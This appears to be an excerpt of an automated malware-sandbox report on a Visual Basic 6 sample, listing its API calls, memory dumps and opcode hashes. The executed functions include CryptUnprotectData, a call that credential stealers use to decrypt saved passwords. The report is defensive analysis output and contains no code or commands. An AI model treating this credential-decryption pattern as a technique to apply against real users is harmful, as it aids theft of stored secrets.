                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413436
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B78,00000178), ref: 004134B7
                                  • __vbaFreeObj.MSVBVM60 ref: 004134C0
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 004134D9
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004134F8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000000F8), ref: 0041351B
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413534
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041354D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001B4), ref: 004135E8
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004135F8
                                  • __vbaFreeStr.MSVBVM60(00413640), ref: 00413638
                                  • __vbaFreeStr.MSVBVM60 ref: 0041363D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$New2$Move$#539#568#685List
                                  • String ID:
                                  • API String ID: 342513763-0
                                  • Opcode ID: 566f44d25e51d024f184304faf747ca645abfa3f411255a16ed79b55571d0051
                                  • Instruction ID: 3ca945c1691dc76619a625bfb7a416ab72cba6d559b2d8c6b6d303b444ff62fa
                                  • Opcode Fuzzy Hash: 566f44d25e51d024f184304faf747ca645abfa3f411255a16ed79b55571d0051
                                  • Instruction Fuzzy Hash: F7B15E70A00204EFDB10DFA9D988ADDBBF5FF48701F14816AE509E72A1D774A985CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00412F93
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412FB2
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001B0), ref: 00412FF1
                                  • __vbaFreeObj.MSVBVM60 ref: 00412FFA
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413013
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041302C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,00000098), ref: 0041304F
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413068
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413081
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001B4), ref: 00413110
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413120
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 0041313C
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413155
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001A8), ref: 00413178
                                  • __vbaFreeObj.MSVBVM60 ref: 00413181
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresultNew2$Free$List
                                  • String ID:
                                  • API String ID: 191279167-0
                                  • Opcode ID: 4d0bae84a3d7e4e2fb508b2ebe4173a5d8cf1858d402ec9a1fa9e3dd671e09c8
                                  • Instruction ID: 4db92017e52da41dc4f3f8bc6451ed8ef8718c1cd75c1621c3a8402d85210daa
                                  • Opcode Fuzzy Hash: 4d0bae84a3d7e4e2fb508b2ebe4173a5d8cf1858d402ec9a1fa9e3dd671e09c8
                                  • Instruction Fuzzy Hash: AB711974A00204EFDB10DFA8C989ADABBF8BF4C701F10856AE949E7361D7749841CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • #714.MSVBVM60(?,?,00000000), ref: 00412D78
                                  • __vbaVarTstNe.MSVBVM60(?,?), ref: 00412D94
                                  • __vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 00412DA7
                                  • __vbaNew2.MSVBVM60(00410B38,00415590), ref: 00412DCB
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,02C5004C,00410B28,00000014), ref: 00412DF6
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410B48,000000C0), ref: 00412E24
                                  • __vbaFreeObj.MSVBVM60 ref: 00412E2F
                                  • __vbaNew2.MSVBVM60(00410B38,00415590), ref: 00412E44
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,02C5004C,00410B28,00000014), ref: 00412E69
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410B48,000000B8), ref: 00412E8F
                                  • __vbaFreeObj.MSVBVM60 ref: 00412E94
                                  • __vbaNew2.MSVBVM60(00410B38,00415590), ref: 00412EA9
                                  • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00412EBF
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,02C5004C,00410B28,00000010), ref: 00412ED9
                                  • __vbaFreeObj.MSVBVM60 ref: 00412EDE
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$Free$New2$#714AddrefList
                                  • String ID:
                                  • API String ID: 169271594-0
                                  • Opcode ID: 0568a1d230a8caa57ea12edfa12266722dda94dc32cd17aecf3355755c58d5c6
                                  • Instruction ID: 51ba7e877fa4e834e69c6cec57e4b1c8469a28caad59076071cc0d998271e2d2
                                  • Opcode Fuzzy Hash: 0568a1d230a8caa57ea12edfa12266722dda94dc32cd17aecf3355755c58d5c6
                                  • Instruction Fuzzy Hash: 43515D70900208EBDB10DFA5CE85BDEB7B9FB48705F20442AE545F72A1D7B86985CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413213
                                  • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041322C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001B0), ref: 0041326F
                                  • __vbaFreeObj.MSVBVM60 ref: 00413278
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckFreeHresultNew2
                                  • String ID:
                                  • API String ID: 1645334062-0
                                  • Opcode ID: 04059985306a21bdb3d7a893a76505209ad17b9c631b098babbaab649d2c9453
                                  • Instruction ID: 0d6b620b9c8aafb99b1c5036108515c20309df57f4824e0ac0c7d72241cbeca4
                                  • Opcode Fuzzy Hash: 04059985306a21bdb3d7a893a76505209ad17b9c631b098babbaab649d2c9453
                                  • Instruction Fuzzy Hash: E7116670A40305EBD700EFA8D949BDABBB8FB4C701F108569F545E7750D77899408BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 5cdacc4beac6ae9d8c2f2d35d053f64f00cef1e4fc77997a728c8de384dcb865
                                  • Instruction ID: 27b936db9e1e15bf928e4406c1ac7eb1189633384b62aca26b50992f7c1631bf
                                  • Opcode Fuzzy Hash: 5cdacc4beac6ae9d8c2f2d35d053f64f00cef1e4fc77997a728c8de384dcb865
                                  • Instruction Fuzzy Hash: C3A22874A04228CFDB64EF70C89879DB7B6BB88305F1080EAD54AA3794DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00AE71CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: CryptDataUnprotect
                                  • String ID:
                                  • API String ID: 834300711-0
                                  • Opcode ID: 3c72ee22bd42eaec4e803df5a9d880d725b2e773bc279e241f0acc32a409bb7a
                                  • Instruction ID: 2a25ca1e1e6dff19e8b0f965eb242a3f24876566856357d35d2566c464ba68ad
                                  • Opcode Fuzzy Hash: 3c72ee22bd42eaec4e803df5a9d880d725b2e773bc279e241f0acc32a409bb7a
                                  • Instruction Fuzzy Hash: ED1134B28043499FCB10DF99D845BEEBFF4EF48320F14841AEA14A7210C779AA54DFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00AE71CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: CryptDataUnprotect
                                  • String ID:
                                  • API String ID: 834300711-0
                                  • Opcode ID: 49b62fc3c4a359e970dd61559fc89d08eab05cb0054fe821db93bbfb055d6bda
                                  • Instruction ID: b60adc547069dc2da6ea47b381e98d271ee173e2ff3c884e627a3b4811b5cc95
                                  • Opcode Fuzzy Hash: 49b62fc3c4a359e970dd61559fc89d08eab05cb0054fe821db93bbfb055d6bda
                                  • Instruction Fuzzy Hash: E01134B68042499FDB10CF99C845BDEBFF4EF48320F148459EA54A7210D739AA54CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 2953f91cef26fcc125068fea05780d8d9a32fac6aa015dc3de37325ecfd5e91e
                                  • Instruction ID: e2590b0366e26ef9c3a77bd9ce9b59c0c5154713fb126f2325eeb970a5bf51fd
                                  • Opcode Fuzzy Hash: 2953f91cef26fcc125068fea05780d8d9a32fac6aa015dc3de37325ecfd5e91e
                                  • Instruction Fuzzy Hash: 95620874A04228CFDB65EF70C898799B7B6BF88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 4a92993ea0debb75d8c1e3273790834f6ead05234ac854c806af6b8f064277ac
                                  • Instruction ID: 874af17b2f09dd44efd672532a98a159e34582a1bc5c080c8eb7d558ec2cef31
                                  • Opcode Fuzzy Hash: 4a92993ea0debb75d8c1e3273790834f6ead05234ac854c806af6b8f064277ac
                                  • Instruction Fuzzy Hash: E8620774A04228CFDB65EF70C898799B7B6BF88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 6b11ad4b9709ed2db6b8170d0a712534faa4a3e8af7879d927fdc8be2a645b07
                                  • Instruction ID: 45025fcbc362bb27bb56104becadd6a4546ba2b39ef003b595a4fcdf117704fc
                                  • Opcode Fuzzy Hash: 6b11ad4b9709ed2db6b8170d0a712534faa4a3e8af7879d927fdc8be2a645b07
                                  • Instruction Fuzzy Hash: 0662F774A04228CFDB65EF70C898799B7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 46a62f1742349503fcc882c0799bbabb8e1317bac19c251927e79369f2e6b41d
                                  • Instruction ID: 23137ac427960add64ac731a2e53d328eb2854e645333b9005dfed23de4d66da
                                  • Opcode Fuzzy Hash: 46a62f1742349503fcc882c0799bbabb8e1317bac19c251927e79369f2e6b41d
                                  • Instruction Fuzzy Hash: A552F774A04228CFDB65EF70C898799B7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 81f565df27e571f1e42ba2e19f77d1c2155d677b605ce684a98a46984a1480b1
                                  • Instruction ID: 43d1825f3e1891bdd8c62e924da019a0b6f55d24e36e3c071fa8eb595b35eda9
                                  • Opcode Fuzzy Hash: 81f565df27e571f1e42ba2e19f77d1c2155d677b605ce684a98a46984a1480b1
                                  • Instruction Fuzzy Hash: 8452F774A04228CFDB65EF70C898799B7B6BF88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 7ab12e67641c8398514334a2a36b36ce390f10e30747e9e13753cdaccc689a56
                                  • Instruction ID: d3dfc87fdd0932e327a61826e6f73b4e46d576cc777f9943be5a72c925075a32
                                  • Opcode Fuzzy Hash: 7ab12e67641c8398514334a2a36b36ce390f10e30747e9e13753cdaccc689a56
                                  • Instruction Fuzzy Hash: A152F774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 4abf0efb21912b37e61a9ea3d9f21d96b6c32ba07497c69d24bcc1225e96d6c8
                                  • Instruction ID: ed3ad3b898743a40b0ea8112ca51bf94e8fc2e2d50406655b90be3a575e247fe
                                  • Opcode Fuzzy Hash: 4abf0efb21912b37e61a9ea3d9f21d96b6c32ba07497c69d24bcc1225e96d6c8
                                  • Instruction Fuzzy Hash: A7520774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: bb9152d817f5658071bc7229f79a6f9246348cb03509a6a9703a3727811ba425
                                  • Instruction ID: 4a5a11c4b13a37c4480dbf048004749af593aac5d72915c6f91b4253a43f3968
                                  • Opcode Fuzzy Hash: bb9152d817f5658071bc7229f79a6f9246348cb03509a6a9703a3727811ba425
                                  • Instruction Fuzzy Hash: 4752F774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 00106BBE
                                  • LdrInitializeThunk.NTDLL ref: 0010779F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 61d324e7302be156a8e580dd73a76db22b3e61f1c5f3aa57846b80dd891f5566
                                  • Instruction ID: a0650c5ccf3ec3ead21db90dcae0819000de0a4636dbde412c57826cd0197453
                                  • Opcode Fuzzy Hash: 61d324e7302be156a8e580dd73a76db22b3e61f1c5f3aa57846b80dd891f5566
                                  • Instruction Fuzzy Hash: 6F52F674A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f056a802ac1a2e59caa2bca834aa5f4fe23c736db08d77edd2827d59d1dff625
                                  • Instruction ID: 7d918ec17f624b449ab70ea2090fc62264ce92364b1a451ad29f39a1f830a0a0
                                  • Opcode Fuzzy Hash: f056a802ac1a2e59caa2bca834aa5f4fe23c736db08d77edd2827d59d1dff625
                                  • Instruction Fuzzy Hash: 2E52F774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 804aa56acac5c0c673ab0f3d50d03d97153f1eb4ee9a6ec68a5161b5b24c98e8
                                  • Instruction ID: 7820105b64d8970b9802b73e7b45f909a80fccecb6815758200abbb3acdfd898
                                  • Opcode Fuzzy Hash: 804aa56acac5c0c673ab0f3d50d03d97153f1eb4ee9a6ec68a5161b5b24c98e8
                                  • Instruction Fuzzy Hash: E0420774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7c62effb7221a4e5ba0dc6bd0724c7e18872288518b33b2eb13b1745af251988
                                  • Instruction ID: fe5d36b22ef631f2dfe09b229f782ddea7184bc1b5a3e5e8e3cc3b094923b490
                                  • Opcode Fuzzy Hash: 7c62effb7221a4e5ba0dc6bd0724c7e18872288518b33b2eb13b1745af251988
                                  • Instruction Fuzzy Hash: 4A42F774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ac76ac0cb0167c6306ff6517614ff4e49c03608ea28ff8c9affeebdd0cba5157
                                  • Instruction ID: d94571eec1af2195fb98d0e12897c54c5ca7af976d1cff03dd61156e6b836077
                                  • Opcode Fuzzy Hash: ac76ac0cb0167c6306ff6517614ff4e49c03608ea28ff8c9affeebdd0cba5157
                                  • Instruction Fuzzy Hash: 76420774A04228CFDB65EF70C89879DB7B6BB88305F1080EAD54AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c71b53a46b47ed70e6d177dcca58924bc5070c8c2960c1dc9ab2f1cbc5d18703
                                  • Instruction ID: ed665005acad239b1d6c8fd3f6231727ff14d2e8f8576af2a6a35ffee3b4e283
                                  • Opcode Fuzzy Hash: c71b53a46b47ed70e6d177dcca58924bc5070c8c2960c1dc9ab2f1cbc5d18703
                                  • Instruction Fuzzy Hash: 85420874A05228CFDB64EF70C89879DB7B6BB88305F1080EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 675cc903f7e5e87ba0aa6ffbef9164a580b1a9774b2acb4a106be1a530e75483
                                  • Instruction ID: 73384b8c70181a0927a0363516e68f8c230eb768b56c3f50613272f227f85a20
                                  • Opcode Fuzzy Hash: 675cc903f7e5e87ba0aa6ffbef9164a580b1a9774b2acb4a106be1a530e75483
                                  • Instruction Fuzzy Hash: E942F974A04228CFDB65EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c83115340ce048dcb7d2c769c01fca0d59e96e02962a69b6468596540948f1ac
                                  • Instruction ID: 2c8b838b640343db39ef3728207e4c4191273edb3c988c3fcc0f5ab6bf1023e2
                                  • Opcode Fuzzy Hash: c83115340ce048dcb7d2c769c01fca0d59e96e02962a69b6468596540948f1ac
                                  • Instruction Fuzzy Hash: 4C420A74A05228CFDB65EF70C89879DB7B6BB88305F1080EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6f0c138861efffee65e7675f1ab605ff646eb23aba4e7c73118404919a8b84f0
                                  • Instruction ID: 2e2888e525d4eaf6f93f23602627a6a298c88aa54fad46e5671c26441a4239a2
                                  • Opcode Fuzzy Hash: 6f0c138861efffee65e7675f1ab605ff646eb23aba4e7c73118404919a8b84f0
                                  • Instruction Fuzzy Hash: 0A420A74905228CFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 598405f91dace8569dbf3a3275f261bd0555378542634c5e3f6e83884b675249
                                  • Instruction ID: 941daaacbe1c901e18b6c5c69c70ff3ac101e5a5e1ee1301774ebb88ddbae540
                                  • Opcode Fuzzy Hash: 598405f91dace8569dbf3a3275f261bd0555378542634c5e3f6e83884b675249
                                  • Instruction Fuzzy Hash: 5E320B74905228DFDB64EF70C89879DB7B6BB88305F1080EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 98aa9e5e45e3f12aef1091161ba7d11982ff93a50aecd058ae6f08fbc3a60a22
                                  • Instruction ID: 1974fb8f174280831d24ee8f1b054678ac9fe604d6eb38d3c515828e711cc4b0
                                  • Opcode Fuzzy Hash: 98aa9e5e45e3f12aef1091161ba7d11982ff93a50aecd058ae6f08fbc3a60a22
                                  • Instruction Fuzzy Hash: 68320B74904228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3c3c8a656a3b3a7476b2dfef3ca8db55749ef69d600df40df8f6a9024cf433c1
                                  • Instruction ID: 7259dc9e3789d925e9761ed6a7ed0e5b483f6aca81837390911b7c9c2a52320d
                                  • Opcode Fuzzy Hash: 3c3c8a656a3b3a7476b2dfef3ca8db55749ef69d600df40df8f6a9024cf433c1
                                  • Instruction Fuzzy Hash: 6E320C74904228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c15082959123c42fff829a0a8e8e30acf0a8a36109a9ca36c4bdbd38228a66e0
                                  • Instruction ID: e2ad47d99115b7d07e08129cbb3811ddd8746a7a819b125a113334efdfcacd07
                                  • Opcode Fuzzy Hash: c15082959123c42fff829a0a8e8e30acf0a8a36109a9ca36c4bdbd38228a66e0
                                  • Instruction Fuzzy Hash: 2E320C74A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a21605971cadffd5eee2b33d181d4446c475e7d00cefc674e01e84ecd70be4a8
                                  • Instruction ID: 29b38473ba0148e80a971ab422e5a5a8b80e5eb1e553d8831898f27ef4b0451b
                                  • Opcode Fuzzy Hash: a21605971cadffd5eee2b33d181d4446c475e7d00cefc674e01e84ecd70be4a8
                                  • Instruction Fuzzy Hash: 6B320C74A04228DFDB64EF70C89879DB7B6BB88305F1081EAD50AA3784DB359E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671735037.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 37b8e690a671b3351d1f84902c4f78e8ea1bcf44fa90fef9b3ff3cf3f015c9d9
                                  • Instruction ID: fbf8245b79d5ba2ee6a07986865117aec558f9600c748c71cc351124606d54d7
                                  • Opcode Fuzzy Hash: 37b8e690a671b3351d1f84902c4f78e8ea1bcf44fa90fef9b3ff3cf3f015c9d9
